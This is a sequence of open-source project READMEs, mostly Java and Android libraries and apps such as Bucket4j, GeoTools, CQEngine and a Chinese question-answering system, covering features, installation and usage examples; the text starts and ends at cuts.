(false)|减按钮是否开启fill模式 默认是stroke(false) | delEnableBgColor| color|The background color of the minus button|减按钮的背景色 | delEnableFgColor| color|The foreground color of the minus button|减按钮的前景色 | delDisableBgColor| color|The background color when the button is not available|减按钮不可用时的背景色 | delDisableFgColor| color |The foreground color when the button is not available|减按钮不可用时的前景色 | radius| dimension|The radius of the circle|圆的半径 | circleStrokeWidth| dimension|The width of the circle|圆圈的宽度 | lineWidth| dimension|The width of the line (+ - sign)|线(+ - 符号)的宽度 | gapBetweenCircle| dimension| The spacing between two circles|两个圆之间的间距 | numTextSize| dimension| The textSize of draws the number|绘制数量的textSize | maxCount| integer| max count|最大数量 | count| integer| current count|当前数量 | hintText| string| The hint text when number is 0|数量为0时,hint文字 | hintBgColor| color| The hint background when number is 0|数量为0时,hint背景色 | hintFgColor| color| The hint foreground when number is 0|数量为0时,hint前景色 | hingTextSize| dimension| The hint text size when number is 0|数量为0时,hint文字大小 | hintBgRoundValue| dimension| The background fillet value when number is 0|数量为0时,hint背景圆角值 | ignoreHintArea| boolean| The UI/animation whether ignores the hint area|UI显示、动画是否忽略hint收缩区域 | perAnimDuration| integer| The duration of each animation, in ms|每一段动画的执行时间,单位ms | hintText| string| The hint text when number is 0|数量为0时,hint文字 | replenishTextColor| color| TextColor in replenish status|补货中状态的文字颜色 | replenishTextSize| dimension| TextSize in replenish status|补货中状态的文字大小 | replenishText| string | Text hint in replenish status|补货中状态的文字 这么多属性够你用了吧。 ## Where to find me: [Github](https://github.com/mcxtzhang) [CSDN](http://blog.csdn.net/zxt0601) [稀土掘金](http://gold.xitu.io/user/56de210b816dfa0052e66495) [简书](http://www.jianshu.com/users/8e91ff99b072/timeline) QQ群 :**557266366** *** ## History Version : 1.1.0,Time: 2017/01/12 * 1 Feature : Add a boolean variable `ignoreHintArea` :The UI/animation whether ignores the hint area * 2 Feature : Add a int variable `perAnimDuration` : The duration of each animation, in ms Version : 1.2.0 Time: 2017/02/08 * 1 Feature : Add a status: replenishment.Click is not allowed at this time. * Judgment by setReplenish (boolean) and isReplenish ()
# OuNews 简单的新闻客户端 # ## 一、为什么写这个? ## 一直想练习MVP模式开发应用,把学习的RxJava、Retrofit等热门的开源库结合起来,于是写了这么一款新闻阅读软件, 有新闻、图片、视频三大模块,使用Retrofit和Okhttp实现无网读缓存,有网根据过期时间重新请求, 还有边缘或整页侧滑、夜间模式切换等小功能,还写了几个自定义小控件,虽然无啥卵用,但是学到了很多东西,很有收获。 ## 二、运行截图 ## ![](/pic/1.png) ![](/pic/2.png) ![](/pic/3.png) ![](/pic/4.png) ![](/pic/5.png) ![](/pic/6.png) ![](/pic/7.png) ![](/pic/8.png) ![](/pic/9.png) ![](/pic/10.png) ![](/pic/11.png) ![](/pic/12.png) ## 三、用到的开源库 ## * [Quick-News API来自此项目,特此感谢](https://github.com/tigerguixh/QuickNews) * [RxJava 响应式编程框架](https://github.com/ReactiveX/RxJava) * [Retrofit2.0 REST安卓客户端请求库](https://github.com/square/retrofit) * [OkHttp3 网络请求](https://github.com/square/okhttp) * [Glide 图片加载](https://github.com/bumptech/glide) * [GreenDao 数据库操作](https://github.com/greenrobot/greenDAO) * [PhotoView 图片缩放](https://github.com/chrisbanes/PhotoView) * [Ijkplayer 视频播放](https://github.com/Bilibili/ijkplayer) * [AndroidChangeSkin 无需重启换肤](https://github.com/hongyangAndroid/AndroidChangeSkin) * ...... 感谢各位大神无私的开源精神。 ## 四、一些零散的知识点 ## MVP模式代码学习<br>https://github.com/antoniolg/androidmvp</br> 使用Retrofit和Okhttp实现网络缓存。无网读缓存,有网根据过期时间重新请求<br>http://www.jianshu.com/p/9c3b4ea108a7</br> Retrofit+RxJava实战日志(5)-如何获取缓存<br>http://blog.csdn.net/efan006/article/details/50549107</br> Drawable 着色的后向兼容方案<br>http://www.cnblogs.com/helloandroid/p/4779061.html</br> Java基础加强总结(一)——注解(Annotation)<br>http://www.cnblogs.com/xdp-gacl/p/3622275.html</br> Android实现RecyclerView侧滑删除和长按拖拽-ItemTouchHelper<br>http://blog.csdn.net/u010687392/article/details/47950199</br> 基于RxJava、RxAndroid的EventBus实现<br>http://www.cnblogs.com/tiantianbyconan/p/4578699.html</br> 深入浅出RxJava<br>http://blog.csdn.net/lzyzsd/article/details/41833541</br> ## 五、声明 ## 应用中展示的所有内容均搜集自互联网,若内容有侵权请联系作者进行删除处理。本应用仅用作分享与学习。 ## 六、关于作者 ## 微博:http://weibo.com/palfansinheart CSDN博客:http://blog.csdn.net/oushangfeng123?viewmode=contents
## 前言 一个算法模型的落地需要经历从算法任务确立,到方法调研、模型选型和优化、数据采集标定、模型训练、部署验证等一整个pipeline,其中对于绝大多数的算法工程师,模型的训练和输出是没有问题的,但是要快速地进行模型在移动设备上的效果验证,则需要移动端开发人员和配合才能完成。另一方面,考虑到团队内CV算法研究方向很多,如果每个模型都单独在移动端开发一套验证APP的话显然费时费力,重复造轮子。 ![](img/1.jpg) 为了解决模型移动端部署验证困难,以及每个模型都单独在移动端开发一套验证APP带来的重复工作的问题,本项目实现了CV算法快速验证框架项目,旨在提供一套通用的CV算法验证框架。框架经过本人一年多的开发和维护,目前已经完成绝大部分API的开发,实现包括实时视频流模块、单帧图像处理模块、3D场景模块、云端推理模块等众多功能。 > **大家可以看到我做的很多其他项目都用到了这个框架,比如L-ink、火星车等,本仓库将这个框架的非核心部分开源出来,代码里整合了重新编译的OpenCV native和JAVA库,大家可以自己扩展用于实现自己的项目。** ## CV算法验证框架设计 构建包含推理的应用程序所涉及的不仅仅是运行深度学习推理模型,开发者还需要做到以下几点: - 利用各种设备的功能 - 平衡设备资源使用和推理结果的质量 - 通过流水线并行运行多个操作 - 确保时间序列数据同步正确 本框架解决了这些挑战,将上述软件框架解耦为`数据流控制层`、`nn推理引擎层`,以及`UI层`进行框架实现,把数据流处理管道构建为模块化组件,包括推理处理模型和媒体处理功能等。 * 其中数据流控制层包含三个大的模块 -- 视频流模块、图片和编辑模块、3D场景模块,每个模块提供可供配置的数据流参数接口,同时提供了一些常用的工具包如`OpenCV`、`QVision`等用于作为模型的数据输入和预处理。 * nn推理引擎层则集成了一些移动端常用的推理框架比如`SNPE`、`TensorFlow Lite`等,并提供统一模板便于后续持续维护扩展其他推理框架。 * UI层则封装好了图像渲染模块,以及各种调试控件。在API方面,该算法验证框架提供了Native/JAVA/Script三个层次的API,前两者可以在Android工程中进行快速模型集成,Script API则不需要编写任何APP 代码,通过文本脚本解析的形式配置模型推理选项。 通过以上功能使开发者可以专注于算法或模型开发,并使用本框架作为迭代改进其应用程序的环境,其结果可在不同的设备和平台上重现。 下图是本框架的模块划分架构图: ![](img/2.jpg) ## API接口说明 从图中各个模块的名字可以看出个模块的功能,输入是转换好的算法模型,以及图像数据流,其中图像数据流分为摄像头采集的视频数据帧、相册选取的单帧图像,以及应用于3DCNN的3维模型文件。 本框架提供了Native/JAVA/Script三个层次的API,前两者可以在Android工程中进行快速模型集成,其中Native为C/C++接口,提供JNI模板以及封装好的通信组件便于和JAVA进行数据交互;JAVA层则为Android API,使用和C++一样风格的进行封装,此外提供一些UI绘制函数接口;Script API则不需要编写任何APP 代码,通过文本脚本解析的形式配置模型推理选项。 举例在JAVA API下,算法模型在代码中的初始化方式如下,以高通平台的SNPE Runtime为例,只需要几行非常简单的代码即可加载并初始化模型: ![](img/3.jpg) 如代码所示,模型文件的加载方式比较灵活,可以作为FileInputStream加载,也可以作为APP的Asset进行加载。 而图像数据的预处理和结果回调使用也非常简单,通过提供的OpenCV、QVison等CV库封装接口,可以方便地调取很多图像处理函数: ![](img/4.jpg) 其中常用的一些操作比如数据的归一化等函数都经过底层优化,保证数据一致性和高效性,比如数据类型的转换使用了zero-copy: ![](img/5.jpg) 同时OpenCV的编译开启了NEON指令、OpenMP多核等加速选项,对于图像的归一化等操作可以做到并行化加速。 **具体的接口reference说明请参考工程代码。** ## 模型优化算法实现和工具封装 除了APP侧的接口外,本CV算法验证框架提供了一套配套的模型优化工具,包括: * 模型8bit量化工具 * 模型结构化剪枝工具 * 模型转换工具 使用TensorFlow或者PyTorch等Training框架训练好的pb、pth、onnx等模型文件并不能直接在移动端进行部署运行,而是需要做一些模型转换工作,本框架将各种转换工具打包,提供了一套方便的模型转换工具。 其中的模型量化工具基于TensorFlow的TOCO、Pytorch的QNNPACK等实现。 剪枝工具则是根据论文**Learning Efficient Convolutional Networks Through Network Slimming (ICCV 2017)**提到的模型剪枝方法进行复现实现的。 模型转换工具和具体的Inference Runtime有关,比如SNPE则是使用DLC转换脚本、TensorFlow使用的是TF Lite转换工具等等。 ![](img/6.jpg) 如上图所示,除了模型优化工具,框架的工具包中还提供了一些预训练和部署好的Model Zoo,用于做同平台性能对比测试的Baseline,目前以及实现部署好的有YOLO、MTCNN、Openpose等模型。 ## 框架在移动端的实际效果 > * Camera视频流、单帧图像,以及3D场景模块选择 > > * 同一框架下可以同时验证多个算法模型 > * 模型实际运行效果 ![](img/7.jpg)
Java rate limiting library based on token-bucket algorithm.
apache-ignite hazelcast infinispan jcache oracle-coherence rate-limit rate-limiter rate-limiting token-bucket
![](/asciidoc/src/main/docs/asciidoc/images/white-logo.png) # Java rate-limiting library based on token-bucket algorithm. [![Licence](https://img.shields.io/hexpm/l/plug.svg)](https://github.com/bucket4j/bucket4j/blob/master/LICENSE.txt) #### Get dependency The Bucket4j is distributed through [Maven Central](http://search.maven.org/): ```xml <!-- For java 11+ --> <dependency> <groupId>com.bucket4j</groupId> <artifactId>bucket4j-core</artifactId> <version>8.10.1</version> </dependency> <!-- For java 8 --> <dependency> <groupId>com.bucket4j</groupId> <artifactId>bucket4j_jdk8-core</artifactId> <version>8.10.1</version> </dependency> ``` #### Quick start ```java import io.github.bucket4j.Bucket; ... // bucket with capacity 20 tokens and with refilling speed 1 token per each 6 second private static Bucket bucket = Bucket.builder() .addLimit(limit -> limit.capacity(20).refillGreedy(10, Duration.ofMinutes(1))) .build(); private void doSomethingProtected() { if (bucket.tryConsume(1)) { doSomething(); } else { throw new SomeRateLimitingException(); } } ``` More examples [can be found there](https://bucket4j.github.io/8.3.0/toc.html#quick-start-examples) ## [Documentation](https://bucket4j.github.io) * [Reference](https://bucket4j.github.io/8.10.1/toc.html) * [Quick start examples](https://bucket4j.github.io/8.10.1/toc.html#quick-start-examples) * [Third-party articles](https://bucket4j.github.io/#third-party-articles) ## [Spring boot starter](https://github.com/MarcGiffing/bucket4j-spring-boot-starter) Bucket4j is not a framework, it is a library, with Bucket4j you need to write a code to achive your goals. For generic use-cases, try to look at powerfull [Spring Boot Starter for Bucket4j](https://github.com/MarcGiffing/bucket4j-spring-boot-starter), that allows you to set access limits on your API effortlessly. Its key advantage lies in the configuration via properties or yaml files, eliminating the need for manual code authoring. ## Bucket4j basic features * *Absolutely non-compromise precision* - Bucket4j does not operate with floats or doubles, all calculation are performed in the integer arithmetic, this feature protects end users from calculation errors involved by rounding. * *Effective implementation in terms of concurrency*: - Bucket4j is good scalable for multi-threading case it by defaults uses lock-free implementation. - In same time, library provides different concurrency strategies that can be chosen when default lock-free strategy is not desired. * *Effective API in terms of garbage collector footprint*: Bucket4j API tries to use primitive types as much as it is possible in order to avoid boxing and other types of floating garbage. * *Pluggable listener API* that allows to implement monitoring and logging. * *Rich diagnostic API* that allows to investigate internal state. * *Rich configuration management* - configuration of the bucket can be changed on fly ## Bucket4j distributed features In additional to basic features described above, ```Bucket4j``` provides ability to implement rate-limiting in cluster of JVMs: - Bucket4j out of the box supports any GRID solution which compatible with JCache API (JSR 107) specification. - Bucket4j provides the framework that allows to quickly build integration with your own persistent technology like RDMS or a key-value storage. - For clustered usage scenarios Bucket4j supports asynchronous API that extremely matters when going to distribute world, because asynchronous API allows avoiding blocking your application threads each time when you need to execute Network request. ### Supported JCache compatible(or similar) back-ends In addition to local in-memory buckets, the Bucket4j supports clustered usage scenario on top of following back-ends: | Back-end | Async supported | Optimized serialization | Thin-client support | Documentation link | | :--- | :---: | :---: |:-------------------:|:------------------------------------------------------------------------------:| | ```JCache API (JSR 107)``` | No | No | No | [bucket4j-jcache](https://bucket4j.github.io/8.7.0/toc.html#bucket4j-jcache) | | ```Hazelcast``` | Yes | Yes | No | [bucket4j-hazelcast](https://bucket4j.github.io/8.7.0/toc.html#bucket4j-hazelcast) | | ```Apache Ignite``` | Yes | n/a | Yes | [bucket4j-ignite](https://bucket4j.github.io/8.7.0/toc.html#bucket4j-ignite) | | ```Inifinispan``` | Yes | Yes | No | [bucket4j-infinispan](https://bucket4j.github.io/8.7.0/toc.html#bucket4j-infinispan) | | ```Oracle Coherence``` | Yes | Yes | No | [bucket4j-coherence](https://bucket4j.github.io/8.7.0/toc.html#bucket4j-coherence) | ### Redis back-ends | Back-end | Async supported | Redis cluster supported | Documentation link | | :--- | :---: |:-----------------------:|:----------------------------------------------------------------------------------------------------------------------------:| | ```Redis/Redisson``` | Yes | Yes | [bucket4j-redis/Redisson](https://bucket4j.github.io/8.7.0/toc.html#example-of-bucket-instantiation-via-redissonbasedproxymanager) | | ```Redis/Jedis``` | No | Yes | [bucket4j-redis/Jedis](https://bucket4j.github.io/8.7.0/toc.html#example-of-bucket-instantiation-via-jedisbasedproxymanager) | | ```Redis/Lettuce``` | Yes | Yes | [bucket4j-redis/Lettuce](https://bucket4j.github.io/8.7.0/toc.html#example-of-bucket-instantiation-via-lettucebasedproxymanager) | ### JDBC back-ends | Back-end | Documentation link | |:---------------------------|:-------------------------------------------------------------------------------------------:| | ```MySQL``` | [bucket4j-mysql](https://bucket4j.github.io/8.10.1/toc.html#mysql-integration) | | ```PostgreSQL``` | [bucket4j-postgresql](https://bucket4j.github.io/8.10.1/toc.html#postgresql-integration) | | ```Oracle``` | [bucket4j-oracle](https://bucket4j.github.io/8.10.1/toc.html#oracle-integration) | | ```Microsoft SQL Server``` | [bucket4j-mssql](https://bucket4j.github.io/8.10.1/toc.html#microsoftsqlserver-integration) | | ```MariaDB``` | [bucket4j-mariadb](https://bucket4j.github.io/8.10.1/toc.html#mariadb-integration) | ### Local caches support Sometimes you are having deal with bucket per key scenarios but distributed synchronization is unnecessary, for example where request stickiness is provided by a load balancer, or other use-cases where stickiness can be achieved by the application itself, for example, Kafka consumer. For such scenarios Bucket4j provides support for following list of local caching libraries: | Back-end | Documentation link | | :--- | :---: | | ```Caffeine``` | [bucket4j-caffeine](https://github.com/bucket4j/bucket4j/blob/7.3/bucket4j-caffeine/src/main/java/io/github/bucket4j/caffeine/CaffeineProxyManager.java) | ### Third-party integrations | Back-end | Project page | | :--- |:------------------------------------------------------------------------:| | ```Datomic Database``` | [clj-bucket4j-datomic](https://github.com/fr33m0nk/clj-bucket4j-datomic) | ## Have a question? Feel free to ask via: * [Bucket4j issue tracker](https://github.com/bucket4j/bucket4j/issues/new) to report a bug. * [Bucket4j discussions](https://github.com/bucket4j/bucket4j/discussions) for questions, feature proposals, sharing of experience. ## License Copyright 2015-2021 Vladimir Bukhtoyarov Licensed under the Apache Software License, Version 2.0: <http://www.apache.org/licenses/LICENSE-2.0>. ## Java compatibility matrix :heavy_exclamation_mark: Since July 2022(release 8.0.0) it was decided to migrate Bucket4j to Java 11. :shit: Obviously, it bad news for all who get stuck on Java 8 by different reasons. :ambulance: Bucket4j maintainers understand your pain and provide special builds with dedicated artifacts for java 8. :gift: Maven artifacts for Java 8, currently are provided for free. :heavy_dollar_sign: Keep in mind that access to fresh releases of Bucket4j for Java 8 can be moved to a commercial model at any moment. :pill: Right Maven artifact name for Java 8 can be found on [jdk-matrix-compatibility page](java-compatibility-matrix.md). ## :beer: Want to support? [Make donate](https://app.lava.top/ru/2716741203?donate=open) to increase motivation of maintainer.
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![GeoTools logo](/geotools-logo.png) [GeoTools](http://geotools.org) is an open source Java library that provides tools for geospatial data. Our Users guide provides an [overview](http://docs.geotools.org/latest/userguide/geotools.html) of the core features, supported formats and standards support. [![DOI](https://zenodo.org/badge/DOI/10.5281/zenodo.5854676.svg)](https://doi.org/10.5281/zenodo.5854676) ## License GeoTools is licensed under the [LGPL](http://www.gnu.org/licenses/lgpl.html). The user guide [license](http://docs.geotools.org/latest/userguide/welcome/license.html) page describes the less restrictive license for documentation and source code examples. ## Contributing The developers guide outlines ways to [contribute ](http://docs.geotools.org/latest/developer/procedures/contribute.html) to GeoTools using patches, pull requests and setting up new modules. If you are already experienced with GitHub please check our [pull request](http://docs.geotools.org/latest/developer/procedures/pull_requests.html) page before you start! ## Building GeoTools uses [Apache Maven](http://maven.apache.org/) for a build system. To build the library run maven from the root of the repository. % mvn clean install See the [user guide](http://docs.geotools.org/latest/userguide/build/index.html) for more details. ## Bugs GeoTools uses [JIRA](https://osgeo-org.atlassian.net/browse/GEOT), hosted by [Atlassian](https://www.atlassian.com/), for issue tracking. ## Mailing Lists The [user list](mailto:geotools-gt2-users@lists.sourceforge.net) is for all questions related to GeoTools usage. The [dev list](mailto:geotools-devel@lists.sourceforge.net) is for questions related to hacking on the GeoTools library itself. ## More Information Visit the [website](http://geotools.org/) or read the [docs](http://docs.geotools.org/).
## QuestionAnsweringSystem是一个Java实现的人机问答系统,能够自动分析问题并给出候选答案。IBM人工智能计算机系统"沃森"(Watson)在2011年2月美国热门的电视智力问答节目"危险边缘"(Jeopardy!)中战胜了两位人类冠军选手,QuestionAnsweringSystem就是IBM Watson的Java开源实现。 [QuestionAnsweringSystem技术实现简要分析](http://blog.sina.com.cn/s/blog_9be6dec10102vq55.html) [QuestionAnsweringSystem在100offer举办的「寻找实干和坚持的技术力量」Side Project赞助活动中荣获最具人气奖](http://i.100offer.com/projects/result) ![100offer最具人气奖.png](100offer最具人气奖.png) [捐赠致谢](https://github.com/ysc/QuestionAnsweringSystem/wiki/donation) ## 使用方法 1、安装JDK8和Maven3.3.3 将JDK的bin目录和Maven的bin目录加入PATH环境变量,确保在命令行能调用java和mvn命令: java -version java version "1.8.0_60" mvn -v Apache Maven 3.3.3 2、获取人机问答系统源码 git clone https://github.com/ysc/QuestionAnsweringSystem.git cd QuestionAnsweringSystem 建议自己注册一个GitHub账号,将项目Fork到自己的账号下,然后再从自己的账号下签出项目源码, 这样便于使用GitHub的Pull requests功能进行协作开发。 3、运行项目 unix类操作系统执行: chmod +x startup.sh & ./startup.sh windows类操作系统执行: ./startup.bat 4、使用系统 打开浏览器访问:http://localhost:8080/deep-qa-web/index.jsp ## 工作原理 1、判断问题类型(答案类型),当前使用模式匹配的方法,将来支持更多的方法,如朴素贝叶斯分类器。 2、提取问题关键词。 3、利用问题关键词搜索多种数据源,当前的数据源主要是人工标注的语料库、谷歌、百度。 4、从搜索结果中根据问题类型(答案类型)提取候选答案。 5、结合问题以及搜索结果对候选答案进行打分。 6、返回得分最高的TopN项候选答案。 ## 目前支持5种问题类型(答案类型) 1、人名 如: APDPlat的作者是谁? APDPlat的发起人是谁? 谁死后布了七十二疑冢? 习近平最爱的女人是谁? 2、地名 如: “海的女儿”是哪个城市的城徽? 世界上流经国家最多的河流是哪一条? 世界上最长的河流是什么? 汉城是哪个国家的首都? 3、机构团体名 如: BMW是哪个汽车公司制造的? 长城信用卡是哪家银行发行的? 美国历史上第一所高等学府是哪个学校? 前身是红色中华通讯社的是什么? 4、数字 如: 全球表面积有多少平方公里? 撒哈拉有多少平方公里? 北京大学占地多少平方米? 撒哈拉有多少平方公里? 5、时间 如: 哪一年第一次提出“大跃进”的口号? 大庆油田是哪一年发现的? 澳门是在哪一年回归祖国怀抱的? 邓小平在什么时候进行南巡讲话? ## 增加新的问题类型(答案类型) 1、在枚举类 org.apdplat.qa.model.QuestionType 中 增加新的问题类型,并在词性和问题类型之间做映射。 2、在资源目录 src/main/resources/questionTypePatterns 中增加新的模式匹配规则来支持新的问题类型的判定 目录中的 3 个文件代表不同抽象层级的模式,只需要在其中一个文件中增加新的模式即可。 3、在类 org.apdplat.qa.questiontypeanalysis.QuestionTypeTransformer 中 将模式匹配规则映射为枚举类 org.apdplat.qa.model.QuestionType 的实例。 ## API接口 调用地址:的作者是谁? 参数: n表示需要返回的答案的个数 q表示问题 编码: 服务端和客户端均使用UTF-8编码 服务端需要修改tomcat配置文件conf/server.xml,在相应的Connector中加入配置URIEncoding="UTF-8" 返回json: [ { "answer": "杨尚川", "score": 1 } ] ## 使用说明 1、初始化MySQL数据库(MySQL作为数据缓存区使用,此步骤可选): 在MySQL命令行中执行QuestionAnsweringSystem/deep-qa/src/main/resources/mysql/questionanswer.sql文件中的脚本 MySQL编码:UTF-8, 主机: 端口:3306 数据库:questionanswer 用户名:root 密码:root 2、构建war文件并部署到tomcat: cd QuestionAnsweringSystem mvn install cp deep-qa-web/target/deep-qa-web-1.2.war apache-tomcat-8.0.27/webapps/ 启动tomcat 3、打开浏览器访问: http://localhost:8080/deep-qa-web-1.2/index.jsp [可部署war包下载](http://pan.baidu.com/s/1hq9pekc) ## 在你的应用中集成人机问答系统QuestionAnsweringSystem QuestionAnsweringSystem提供了两种集成方式,以库的方式嵌入到应用中,以平台的方式独立部署。 下面说说这两种方式如何做。 1、以库的方式嵌入到应用中。 这种方式只支持Java平台,可通过Maven依赖将库加入构建路径,如下所示: <dependency> <groupId>org.apdplat</groupId> <artifactId>deep-qa</artifactId> <version>1.2</version> </dependency> 在应用如何使用呢?示例代码如下: String questionStr = "APDPlat的作者是谁?"; Question question = SharedQuestionAnsweringSystem.getInstance().answerQuestion(questionStr); if (question != null) { List<CandidateAnswer> candidateAnswers = question.getAllCandidateAnswer(); int i=1; for(CandidateAnswer candidateAnswer : candidateAnswers){ System.out.println((i++)+"、"+candidateAnswer.getAnswer()+":"+candidateAnswer.getScore()); } } 运行程序后会在当前目录下生成目录deep-qa,目录里面又有两个目录dic和questionTypePatterns。 dic是中文分词组件依赖的词库,questionTypePatterns是问题类别分析依赖的模式定义,可根据自己的需要修改。 2、以平台的方式独立部署。 首先在自己的服务器上如192.168.0.1部署好了,然后就可以通过Json Over HTTP的方式提供服务,使用方法如下所示: 调用地址:的作者是谁? 参数: n表示需要返回的答案的个数 q表示问题 编码: UTF-8编码 返回json: [ { "answer": "杨尚川", "score": 1 } ] ## 深入了解 QuestionAnsweringSystem由2个子项目构成,deep-qa和deep-qa-web。 deep-qa是核心部分,deep-qa-web提供web界面来和用户交互,同时也提供了Json Over HTTP的访问接口,便于异构系统的集成。 deep-qa是一个jar包,可通过maven引用: <dependency> <groupId>org.apdplat</groupId> <artifactId>deep-qa</artifactId> <version>1.2</version> </dependency> 示例代码如下: String questionStr = "APDPlat的作者是谁?"; Question question = SharedQuestionAnsweringSystem.getInstance().answerQuestion(questionStr); if (question != null) { List<CandidateAnswer> candidateAnswers = question.getAllCandidateAnswer(); int i=1; for(CandidateAnswer candidateAnswer : candidateAnswers){ System.out.println((i++)+"、"+candidateAnswer.getAnswer()+":"+candidateAnswer.getScore()); } } 运行程序后会在当前目录下生成目录deep-qa,目录里面又有两个目录dic和questionTypePatterns。 dic是中文分词组件依赖的词库,questionTypePatterns是问题类别分析依赖的模式定义,可根据自己的需要修改。 ## Watson介绍 Watson is a computer system like no other ever built. It analyzes natural language questions and content well enough and fast enough to compete and win against champion players at Jeopardy! [IBM Watson: How it Works](https://www.youtube.com/watch?v=_Xcmh1LQB9I) [Building Watson - A Brief Overview of the DeepQA Project](https://www.youtube.com/watch?v=3G2H3DZ8rNc) [This is Watson:A detailed explanation of how Watson works](http://ieeexplore.ieee.org/xpl/tocresult.jsp?isnumber=6177717) [The DeepQA Research Team](http://researcher.watson.ibm.com/researcher/view_group.php?id=2099) ## 相关文章 [测试人机问答系统智能性的3760个问题](http://my.oschina.net/apdplat/blog/401622) [人机问答系统的前世今生](http://my.oschina.net/apdplat/blog/420370) [人机问答系统的类别](http://my.oschina.net/apdplat/blog/420720) [What is Question Answering?](https://class.coursera.org/nlp/lecture/155) ## 其他人机问答系统介绍 1、OpenEphyra(Java开源) Ephyra is a modular and extensible framework for open domain question answering (QA). The system retrieves accurate answers to natural language questions from the Web and other sources. [OpenEphyra主页](http://www.ephyra.info/) 2、Watsonsim(Java开源) Open-domain question answering system from UNCC. Watsonsim works using a pipeline of operations on questions, candidate answers, and their supporting passages. In many ways it is similar to IBM's Watson, and Petr's YodaQA. It's not all that similar to more logic based systems like OpenCog or Wolfram Alpha. [Watsonsim主页](https://github.com/SeanTater/uncc2014watsonsim/) 3、YodaQA(Java开源) YodaQA is an open source Question Answering system. using on-the-fly Information Extraction from various data sources (mainly enwiki). YodaQA stands for "Yet anOther Deep Answering pipeline" and the system is inspired by the DeepQA (IBM Watson) papers. It is built on top of the Apache UIMA. [YodaQA主页](https://github.com/brmson/yodaqa/) 4、OpenQA(Java开源) OpenQA is an open source question answering framework that unifies approaches from several domain experts. The aim of OpenQA is to provide a common platform that can be used to promote advances by easy integration and measurement of different approaches. [OpenQA主页](http://openqa.aksw.org/) 5、START(商业) START, the world's first Web-based question answering system, has been on-line and continuously operating since December, 1993. It has been developed by Boris Katz and his associates of the InfoLab Group at the MIT Computer Science and Artificial Intelligence Laboratory. Unlike information retrieval systems (e.g., search engines), START aims to supply users with "just the right information" instead of merely providing a list of hits. Currently, the system can answer millions of English questions about places (e.g., cities, countries, lakes, coordinates, weather, maps, demographics, political and economic systems), movies (e.g., titles, actors, directors), people (e.g., birth dates, biographies), dictionary definitions, and much, much more. [START主页](http://start.csail.mit.edu/index.php) 6、IBM Watson(商业) Watson is built to mirror the same learning process that we have. Watson has been learning the language of professions and is trained by experts to work across many different industries. [IBM Watson主页](http://www.ibm.com/smarterplanet/us/en/ibmwatson/what-is-watson.html) 7、Siri(商业) Siri /ˈsɪri/ is a part of Apple Inc.'s iOS which works as an intelligent personal assistant and knowledge navigator. The feature uses a natural language user interface to answer questions, make recommendations, and perform actions by delegating requests to a set of Web services. [Siri主页](http://www.apple.com/ios/siri/) 8、Wolfram|Alpha(商业) Wolfram|Alpha introduces a fundamentally new way to get knowledge and answers not by searching the web, but by doing dynamic computations based on a vast collection of built-in data, algorithms, and methods. [Wolfram|Alpha主页](http://www.wolframalpha.com/) 9、Evi(商业) Evi was founded in August 2005, originally under the name of True Knowledge, with the mission of powering a new kind of search experience where users can access the world's knowledge simply by asking for the information they need in a way that is completely natural. [Evi主页](https://www.evi.com/) 10、微软小冰(商业) 微软小冰是智能聊天机器人,基于微软搜索引擎和大数据积累,所有数据全部来自于公开的互联网网页信息。 [微软小冰主页](http://www.msxiaoice.com/) 11、Magi Semantic Search(商业) Magi is a search engine that gives you answers instead of references. It's designed to be General, Feasible and Useful. [Magi Semantic Search主页](http://www.peak-labs.com/) [https://travis-ci.org/ysc/QuestionAnsweringSystem](https://travis-ci.org/ysc/QuestionAnsweringSystem)
Ultra-fast SQL-like queries on Java collections
[![Build Status](https://travis-ci.org/npgall/cqengine.svg?branch=master)](https://travis-ci.org/npgall/cqengine) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.googlecode.cqengine/cqengine/badge.svg)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22com.googlecode.cqengine%22%20AND%20a%3Acqengine) # CQEngine - Collection Query Engine # CQEngine – Collection Query Engine – is a high-performance Java collection which can be searched with SQL-like queries, with _extremely_ low latency. * Achieve millions of queries per second, with query latencies measured in microseconds * Offload query traffic from databases - scale your application tier * Outperform databases by a factor of thousands, even on low-end hardware Supports on-heap persistence, off-heap persistence, disk persistence, and supports MVCC transaction isolation. Interesting reviews of CQEngine: * [dzone.com: Comparing the search performance of CQEngine with standard Java collections](https://dzone.com/articles/comparing-search-performance) * [dzone.com: Getting started with CQEngine: LINQ for Java, only faster](https://dzone.com/articles/getting-started-cqengine-linq) * CQEngine in the wild: [excelian.com](http://www.excelian.com/exposure-and-counterparty-limit-checking) | [gravity4.com](http://gravity4.com/welcome-gravity4-engineering-blog/) | [snapdeal.com](http://engineering.snapdeal.com/how-were-building-a-system-to-scale-for-billions-of-requests-per-day-201601/) (3-5 billion requests/day) ## The Limits of Iteration ## The classic way to retrieve objects matching some criteria from a collection, is to iterate through the collection and apply some tests to each object. If the object matches the criteria, then it is added to a result set. This is repeated for every object in the collection. Conventional iteration is hugely inefficient, with time complexity O(_n_ _t_). It can be optimized, but requires **statistical knowledge** of the makeup of the collection. [Read more: The Limits of Iteration](documentation/TheLimitsOfIteration.md) **Benchmark Sneak Peek** Even with optimizations applied to convention iteration, CQEngine can outperform conventional iteration by wide margins. Here is a graph for a test comparing CQEngine latency with iteration for a range-type query: ![quantized-navigable-index-carid-between.png](documentation/images/quantized-navigable-index-carid-between.png) * **1,116,071 queries per second** (on a single 1.8GHz CPU core) * **0.896 microseconds per query** * CQEngine is **330187.50% faster** than naive iteration * CQEngine is **325727.79% faster** than optimized iteration See the [Benchmark](documentation/Benchmark.md) wiki page for details of this test, and other tests with various types of query. --- ## CQEngine Overview ## CQEngine solves the scalability and latency problems of iteration by making it possible to build _indexes_ on the fields of the objects stored in a collection, and applying algorithms based on the rules of set theory to _reduce the time complexity_ of accessing them. **Indexing and Query Plan Optimization** * **Simple Indexes** can be added to any number of individual fields in a collection of objects, allowing queries on just those fields to be answered in O(_1_) time complexity * **Multiple indexes on the same field** can be added, each optimized for different types of query - for example equality, numerical range, string starts with etc. * **Compound Indexes** can be added which span multiple fields, allowing queries referencing several fields to also be answered in O(_1_) time complexity * **Nested Queries** are fully supported, such as the SQL equivalent of "`WHERE color = 'blue' AND(NOT(doors = 2 OR price > 53.00))`" * **Standing Query Indexes** can be added; these allow _arbitrarily complex queries_, or _nested query fragments_, to be answered in O(_1_) time complexity, regardless of the number of fields referenced. Large queries containing branches or query fragments for which standing query indexes exist, will automatically benefit from O(_1_) time complexity evaluation of their branches; in total several indexes might be used to accelerate complex queries * **Statistical Query Plan Optimization** - when several fields have suitable indexes, CQEngine will use statistical information from the 